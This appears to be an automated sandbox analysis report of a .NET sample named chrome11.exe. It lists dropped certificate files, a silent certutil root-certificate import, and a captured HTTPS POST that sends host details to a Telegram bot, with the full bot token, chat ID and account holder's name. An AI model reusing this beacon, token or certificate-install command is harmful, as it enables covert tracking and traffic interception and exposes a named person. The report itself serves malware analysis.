Preview:	0....0....H........$.....0.0....H........$.....0...0......H............0...0(...H.......0....X....^.../p....W.........{"6.C.+&.O}p.6/...\|.h..6@..0...3.bGu...8.K./...`../G.c=.K.?!.W5.......4.0n._m.W&S..@....._..\|/.P1[..b.....W.....5Wn.J....u.K..$.'N..b!.2[[...#.4..i....J.B.zh.[......K....B!...".ZN..9.b9...u2.........d(.:...&m].a.{...M....9.Aq......'.].;. .......?..........n\....r.8.$..8s3.D..$..Z.$..d...).....(=...A....3..<Oth.U..3.2......h\...p........6...^j..W..9..Q....w.a.O.y........W\|G...}.I......x...uPz.=)..J{/..\..2..3.`.....{>..YLa..f..#..Q...~..q.Ge..+. ..\.b.......p.ao...+XK`.0 a<,..*#....$.Z.U./i..i..r.P....y$a..C.r...s...d.<gg..t..G.j...s......^xz... \|...P;'........"g..s.....m......Cb..$..Jw....}..(....f..X'............S..:.Q..(.8h..X.s....eg".....A.M...r..A.....q.G9.....Y..i.L.......r"...j...4...........N....S...Mp...wz...3...#]y./....5..6...F...R.\..J.U[=.)L.O?.t!.mKH..[.B0.!..z ....P.&... .=`..).b..U...k./T.?o..[`.@..q..{.

C:\Users\user\AppData\Local\Temp\TmpC455.tmp

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2631
Entropy (8bit):	7.841145153995131
Encrypted:	false
SSDEEP:	48:LiEUWlXUIWr9ZdiYpA1bd0nqTn3nlf6pPsdkrdFD:L9xXUh9DPA1bdE8d6UkZ
MD5:	DBB05A66426586C397035EBCE4FDFB8A
SHA1:	ABA63C97F879C7E319BC53DAE7A9714986EC35B2
SHA-256:	3AE2483C0531414BFEB1EC07D00B7CB1E6885D8ABD498FFBFA541ABB137149A5
SHA-512:	6FBF442332EA5B7389160E7E00E11D684BA2708F81C9BBE3865C6319215C6CDB0A323370832A54F65E7C0378DCF2D8C0E106D753935C827DF97194D779786766
Malicious:	false
Preview:	0....0....H........$.....0.0....H........$.....0...0......H............0...0(...H.......0....X....^.../p....W.........{"6.C.+&.O}p.6/...\|.h..6@..0...3.bGu...8.K./...`../G.c=.K.?!.W5.......4.0n._m.W&S..@....._..\|/.P1[..b.....W.....5Wn.J....u.K..$.'N..b!.2[[...#.4..i....J.B.zh.[......K....B!...".ZN..9.b9...u2.........d(.:...&m].a.{...M....9.Aq......'.].;. .......?..........n\....r.8.$..8s3.D..$..Z.$..d...).....(=...A....3..<Oth.U..3.2......h\...p........6...^j..W..9..Q....w.a.O.y........W\|G...}.I......x...uPz.=)..J{/..\..2..3.`.....{>..YLa..f..#..Q...~..q.Ge..+. ..\.b.......p.ao...+XK`.0 a<,..*#....$.Z.U./i..i..r.P....y$a..C.r...s...d.<gg..t..G.j...s......^xz... \|...P;'........"g..s.....m......Cb..$..Jw....}..(....f..X'............S..:.Q..(.8h..X.s....eg".....A.M...r..A.....q.G9.....Y..i.L.......r"...j...4...........N....S...Mp...wz...3...#]y./....5..6...F...R.\..J.U[=.)L.O?.t!.mKH..[.B0.!..z ....P.&... .=`..).b..U...k./T.?o..[`.@..q..{.

C:\Users\user\AppData\Local\Temp\rootCert.pfx

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2658
Entropy (8bit):	7.811119298420234
Encrypted:	false
SSDEEP:	48:nnArXVreBH80lixBZJCQf+7fwlHXSMgX569wKQSCo6MAyr9HgFjRSjKCtnkFcs:CV6JGAQf4fyuX58sSjAY9AFjEtkFD
MD5:	3BF5559EF415515627C12373C98C7B28
SHA1:	A79DAB1CE7B5B2EB37A41E4B88F4BA6D6FA21980
SHA-256:	D5D93E716731B92E0B191A114466B25B49477A77F415FD405F6CFEFF72520F18
SHA-512:	69E28B014EC7A63B1F3D7C396EA5AF5C169B50A28F077305AF0F968BAA9913AE65020DFA68EFD6EDD3B0CA421549DC3FB7F8E6497A8732DB825AEB2C964E4D00
Malicious:	false
Preview:	0..^...0......H..............0...0......H..............0...0......H............0...0....H.......0......I...........;.......rJ.\.\|Cm.=5/.(.f....].o52..X.b.......v..y.YY...]...o#..X.P...vT.\|\|..... .H.....B.....>\Wr'e..D.o..G.....f.M....'..w...Q4..A>.n..o<.G..o.%.W.=x)...NTf.W2m.x.uY...l.....S...U.p%.TD1.I.<.p.IY....Q.3.....c.....S...............5.d.....E.g..9.]3.!.O+......]s.U.S...I!>..6.../g..L...O;....y..u....E..-..9`...7..c.qQ...e._m.x.+O.'...:...F.s...l.7.6.tc.m...x..+u.Gk...Dw.CE2.....x#t!.....j.6..k.L..\|L..S...I..c.%\.O..R...}.&..9].....%Xq....hz?.u`9...L.z..D.s"..\|.@..}..*\|...m...W......6..._q9..iE.=(..!..s.?.....i.....,.r......7_./T..+x....}K.>.\|...'.P.{....d..y...]\HT\|.=...../6.T..v bOd..........\n.o.R..!.....i>....2.Cm..x...........+w..;S..~>U....+...fgTR./..3..E..\=.U...B....{......N..J..j^.d......<.[~.....#...W..Q..M...K.4.`.Z8....(..).8.j6[<...u.pF........d..M......a......2\{.+S..d...x.{....wB..!...I....\|d.......r..I.r...q,.....e...

C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2658
Entropy (8bit):	7.813376685244186
Encrypted:	false
SSDEEP:	48:nnArNHICqJxBa3FkwWcYZpopVsKrUEnNwK1kcTwIAI+b8xlUSFCBahLGuCeuMHeb:io7RwE8pVsKIEnNuFIAI+b9SFCBsK9Me
MD5:	DD770865AF71B1E882CE2C73FC8AA491
SHA1:	64334BBD91A859E1A476A0909AB75E84C3636D5E
SHA-256:	46DEBC020B75D393F2A3F7F03941FA6F59049B65EE8B0D7C85CB984AAB097DD0
SHA-512:	9E8C4FD839050810D459432F173E4548CB8078B9CBA71F88AAD3FDAA1B54022280277349B32CF052B64FACF2FC064EC4D5A29E2536AD40B715D201B71987CC77
Malicious:	false
Preview:	0..^...0......H..............0...0......H..............0...0......H............0...0....H.......0....)D...%a.........C.....^.o.r:.]...i..q../...h^...sf...t........x.9.....~F.>.=..n...h,U[[..".........Vu...4.J-.,..G.....t.f\|f.-...\|...}...vv\......!;$.....0~Y.m...w.....s.Sp...@`....p75.Rg.....LT...#]..!.........Z9..J. .].^.o.p..%....c.._.;dS.\.d....2.@`.)..\zs+\|Yg.?..."...V..J \...g.5....3..uI...H.,.Y.#.a..s....W%.hC.\.........}...0......pFRt.}.Ix(.C.QQq..S..6h..S0h.....`.......s]...b..n..?\...]}..W.d...q0J..>..f.6...>j....!R..L......!.d.-..IF..D.o..#.#....l.F..8....y.n....Fi.QL.~r~..C.M.I.TU....{."H..L.#..o2D...OF...).].v.`=....S.....T..H.$..$.$K.........P...R{qE.fsF.k.T.j......9....R.9...N/........`.".......xb.(....>...>t[.?.-X...[.V>..;.s.....T#z0.....b......seJ)..0..qGCG.o..b.....w._N.....k.9....8..D=.)..Y..p.Rd.-$?...@........q#....R:...%}..E'.-.B...r.]..s...kTm.A[:...v.....]b{c.....r.#..p....H..N.b......q....j6.S:p....'h.#

C:\Users\user\AppData\Local\Temp\unique_laptops.txt

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.5804621997271013
Encrypted:	false
SSDEEP:	3:i+mRQfjTNn:i+nft
MD5:	4E442A2A1061BEFB2EE92026988090D0
SHA1:	9B0D1A56078EE5B4E34AB815694186DD0F64032C
SHA-256:	A8615CC54A31B966663B7852F48C4D4467B855438D54257ED97150655AF2550D
SHA-512:	3784BC0332CCCB1015268670312C803AB7AF3A3226A22A2344A6318C8064D7F6DE45BA27DFC953D27ABBB4E74C13709139FCAEC2EC52CEE7AD407E72356D49DB
Malicious:	false
Preview:	965543_EC:F4:BB:45:F6:9D..

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\7770213ABB819C96C7B1A595FF6DEBBB9E0428B0

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	6.700974602219491
Encrypted:	false
SSDEEP:	24:6XoyXoOOd5wr2mgd4/7EaEAFvzVLivHHCeBmJ7f9n7JDo:Jy4Jd5w9geTEg4HJsJzp7JDo
MD5:	29CB125A258144050FED28E2654F029A
SHA1:	141721638597D704CC7E71FE41663A38E398E8FB
SHA-256:	908A4A4F2CB9015DF33D45D0E07187DA2A3124FEBCC4EB675A068291F1D2889B
SHA-512:	8335FCE36D62847B55BE44F93F4B838B77A8BB64335878357864216DF179ADF04BAFB5E584B837D01085B4ADDFCC6472C952191258C8415A0015F849228988A0
Malicious:	false
Preview:	........H...T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.......................PC..a..R.&.............wp!:........m..(.................l.......................C.N.=.T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.....M.i.c.r.o.s.o.f.t. .E.n.h.a.n.c.e.d. .C.r.y.p.t.o.g.r.a.p.h.i.c. .P.r.o.v.i.d.e.r. .v.1...0..... ...........0...0............e.i;0....H........0.1,0..U...#Titanium Root Certificate Authority0...231218122606Z..270323122606Z0.1,0..U...#Titanium Root Certificate Authority0.."0....H.............0............k...p/1...p.LcH.1=..s.\..K.9......#..%.R...2[(.1.4.X...v,..F..&?.F....[.AOuC^..o))."....;.V..UF.........Hk..$.).}....t.......q.8r.;..\|S.!..o..82tR..Q..a<....S(i..`...4.7.}E......3.\F.Da.....^v.......f\|.&&.!L...d...4....'&..@.:"p...Wma.......(0&0...U.%..0...+.......0...U.......0....0....H............."W..u=...k....;k2..sL....X.+..4?}.uZx@.&.DK..0D...T^.-[!.G.4.(...-....I...H#.G..19....?\V_....

C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\B388E1820017AEE7F95043ACEE6193EF52EF269E

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	248
Entropy (8bit):	3.3392597611628227
Encrypted:	false
SSDEEP:	6:+Pk/DMyla8IKx0/ByD+G6sLnA0A2om0im:+P2zKCUB5G66A0gma
MD5:	748D77AD8ABE8D505A0D73CA42C935B6
SHA1:	EFB324A6281F00405B263C99161CCCFE1771CED0
SHA-256:	77D23734B8ED9285A556058686589EDDC0C055F9CE192033C59009EFAC6FF722
SHA-512:	9440B126851E387085C5432E24851F557737437745D0A0B275459251D7ABF5B27002E054159EC13DBB0C39139BB0612D8835D660BB8E5F69AF9DB2F7BD626DD8
Malicious:	false
Preview:	................l.......................C.N.=.T.i.t.a.n.i.u.m. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y.....M.i.c.r.o.s.o.f.t. .E.n.h.a.n.c.e.d. .C.r.y.p.t.o.g.r.a.p.h.i.c. .P.r.o.v.i.d.e.r. .v.1...0.....#...................PC..a..R.&.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.902097026291253
TrID:	Win64 Executable GUI Net Framework (217006/5) 47.53% Win64 Executable GUI (202006/5) 44.25% Win64 Executable (generic) Net Framework (21505/4) 4.71% Win64 Executable (generic) (12005/4) 2.63% Generic Win/DOS Executable (2004/3) 0.44%
File name:	chrome11.exe
File size:	4'767'744 bytes
MD5:	5b39766f490f17925defaee5de2f9861
SHA1:	9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256:	de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
SHA512:	d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf
SSDEEP:	98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
TLSH:	E926E5B4FAA4DA33D16A9271416B531053A4BFD7A33293471B7C325E898A7881F311FB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`................................

File Icon


Icon Hash:	173149cccc490307

Static PE Info

General

Entrypoint:	0x87fb8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6756FEF4 [Mon Dec 9 14:30:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0087FB9Ch]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jo 00007FBC50B595ADh
inc edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ah, dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47fb38	0x54	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x480000	0xdcd6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x47fbac	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47fb9c	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x47dc15	0x47de00	5ceedc658c5649b95f964ce02f43eef1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x480000	0xdcd6	0xde00	0d0799c709de77ebfcd7a616870053c0	False	0.733618384009009	data	7.300073276108226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48e000	0xc	0x200	bce9ae23dfbc6572d8209a860e0b2fe8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x480268	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4913294797687861
RT_ICON	0x4807d0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.46435018050541516
RT_ICON	0x481078	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.39072494669509594
RT_ICON	0x481f20	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.6214539007092199
RT_ICON	0x482388	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4298780487804878
RT_ICON	0x483430	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.32863070539419087
RT_ICON	0x4859d8	0x7cfc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9984998124765596
RT_GROUP_ICON	0x48d6d4	0x68	data	0.7019230769230769
RT_VERSION	0x48d73c	0x3b0	data	0.4046610169491525
RT_MANIFEST	0x48daec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 12:46:37.401339054 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:37.401401997 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:37.401468992 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:37.429431915 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:37.429457903 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:38.857660055 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:38.857736111 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:38.861005068 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:38.861017942 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:38.861331940 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:38.915697098 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:38.942833900 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:38.987329006 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:39.333859921 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:39.333880901 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:39.475855112 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:39.525068045 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:39.803384066 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:39.803533077 CET	443	49707	149.154.167.220	192.168.2.9
Dec 18, 2024 12:46:39.803591013 CET	49707	443	192.168.2.9	149.154.167.220
Dec 18, 2024 12:46:39.819338083 CET	49707	443	192.168.2.9	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 12:46:37.249243975 CET	51254	53	192.168.2.9	1.1.1.1
Dec 18, 2024 12:46:37.386552095 CET	53	51254	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 12:46:37.249243975 CET	192.168.2.9	1.1.1.1	0xc859	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 12:46:37.386552095 CET	1.1.1.1	192.168.2.9	0xc859	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	149.154.167.220	443	7636	C:\Users\user\Desktop\chrome11.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 11:46:38 UTC	217	OUT	POST /bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage HTTP/1.1 Content-Type: application/json; charset=utf-8 Host: api.telegram.org Content-Length: 95 Expect: 100-continue Connection: Keep-Alive
2024-12-18 11:46:39 UTC	95	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 37 31 30 35 37 30 39 38 31 33 22 2c 22 74 65 78 74 22 3a 22 53 79 73 74 65 6d 20 4e 61 6d 65 3a 20 39 36 35 35 34 33 0d 0a 4e 65 77 20 6c 61 70 74 6f 70 20 64 65 74 65 63 74 65 64 20 72 75 6e 6e 69 6e 67 20 74 68 65 20 70 72 6f 67 72 61 6d 21 22 7d Data Ascii: {"chat_id":"7105709813","text":"System Name: 965543New laptop detected running the program!"}
2024-12-18 11:46:39 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-18 11:46:39 UTC	722	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 11:46:39 GMT Content-Type: application/json Content-Length: 334 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":3619,"from":{"id":7587476277,"is_bot":true,"first_name":"calliebot","username":"callie_thrubot"},"chat":{"id":7105709813,"first_name":"Maik","last_name":"Fleischer","username":"MaikFleischer","type":"private"},"date":1734522399,"text":"System Name: 965543\nNew laptop detected running the program!"}}

Target ID:	0
Start time:	06:46:35
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\chrome11.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\chrome11.exe"
Imagebase:	0x1d22e7a0000
File size:	4'767'744 bytes
MD5 hash:	5B39766F490F17925DEFAEE5DE2F9861
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:46:42
Start date:	18/12/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmpC4B4.tmp"
Imagebase:	0x7ff766530000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:46:42
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF887DF3980 Relevance: 2.8, Strings: 2, Instructions: 316COMMON

Download Yara Rule

Strings

0WR, xrefs: 00007FF887DF76E1
r6H, xrefs: 00007FF887DF720A

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: 0WR$r6H
API String ID: 0-85033063
Opcode ID: f51e3fb351974b0d189241b58de828b4e7652ae9a89762d2e7fa5ab58dd864b3
Instruction ID: 8c769d5ef1d87bbd8bd2a284066c71637caf40849e042c8a1cb85762e2b90d08
Opcode Fuzzy Hash: f51e3fb351974b0d189241b58de828b4e7652ae9a89762d2e7fa5ab58dd864b3
Instruction Fuzzy Hash: 09B1B070918A8D8FDB85DF28C8556ED7BF1FF58310F4502AAE819CB292DB38E915CB41

Function 00007FF887E00F97 Relevance: .8, Instructions: 777COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b248d4f6af2bf9ac4e39465283e76fe815ef18dbdf0266fc991f82b3317f1dd1
Instruction ID: dfb8ccd3b09755fb70db50ac6262cfd7c2cd15598c89a6f5bf1bea33e7a2fa26
Opcode Fuzzy Hash: b248d4f6af2bf9ac4e39465283e76fe815ef18dbdf0266fc991f82b3317f1dd1
Instruction Fuzzy Hash: E4126F30A0965DCFEB95EB68D851BACBBB1FF4A340F5401B9D00DD7292CA39AD85CB41

Function 00007FF887C04D32 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3d2193bf001e4787153f33e8ac984f46d563820e7ded84257dd4ce0c91b0a7
Instruction ID: f231215bf63c33806574c059bb122caf58f466d4acf985bf5664e44327a9af68
Opcode Fuzzy Hash: 4e3d2193bf001e4787153f33e8ac984f46d563820e7ded84257dd4ce0c91b0a7
Instruction Fuzzy Hash: 8FE1B230908A4E8FEBA8DF28D8557ED77E2FB55350F04426AD84DC7291DE78A944CBC2

Function 00007FF887E06E07 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 741a9621e434dc554c853060db66e667a77834985a683a83b11bda7cd01f50f2
Instruction ID: 8967b4cdee9adc28016fe85347cac423d7973f4c8de098c5629b1a1252a49fde
Opcode Fuzzy Hash: 741a9621e434dc554c853060db66e667a77834985a683a83b11bda7cd01f50f2
Instruction Fuzzy Hash: F151E03194AA8A9FEB46DB64D8157FD7BB1FF07380F1400BEC049DB1A2CA2D5949CB91

Function 00007FF887C0A1F3 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862b9d1ce78d83756e0309bbea805dde804f82a929f56eca1009b19c8b639d89
Instruction ID: 2fa698ae7c04cc2a0ce064d39435e90f485c08011fe78ea4ef18aca260d93e97
Opcode Fuzzy Hash: 862b9d1ce78d83756e0309bbea805dde804f82a929f56eca1009b19c8b639d89
Instruction Fuzzy Hash: 3D61CB71D4D65A8FEB55DBA8D8916FCBBB2FF15340F14007ED009EB282DA39A941CB81

Function 00007FF887C05EDE Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1480741877.00007FF887C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887c00000_chrome11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45bceea65e6fc3052996fe4c59fdd65646c3ffbbd433d58048efa3f3c6bf32f6
Instruction ID: a47c9e788b01f86f78719c580c8626e9fbdad2226e702b2b7245203737439b1f
Opcode Fuzzy Hash: 45bceea65e6fc3052996fe4c59fdd65646c3ffbbd433d58048efa3f3c6bf32f6
Instruction Fuzzy Hash: F7513B30E18A5DCFEB89EFA8D4556ACBBB1FF5A344F5400AAC00DE7292CA345885CB01

Function 00007FF887DF5A79 Relevance: 9.3, Strings: 7, Instructions: 560
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6H, xrefs: 00007FF887DF5C91
r6H, xrefs: 00007FF887DF5CC2
r6H, xrefs: 00007FF887DF5B9A
r6H, xrefs: 00007FF887DF5B10
r6H, xrefs: 00007FF887DF5C07
r6H, xrefs: 00007FF887DF5D2B
r6H, xrefs: 00007FF887DF5D6C

Memory Dump Source

Source File: 00000000.00000002.1482032619.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887df0000_chrome11.jbxd

Similarity

API ID:
String ID: r6H$r6H$r6H$r6H$r6H$r6H$r6H
API String ID: 0-2638412420
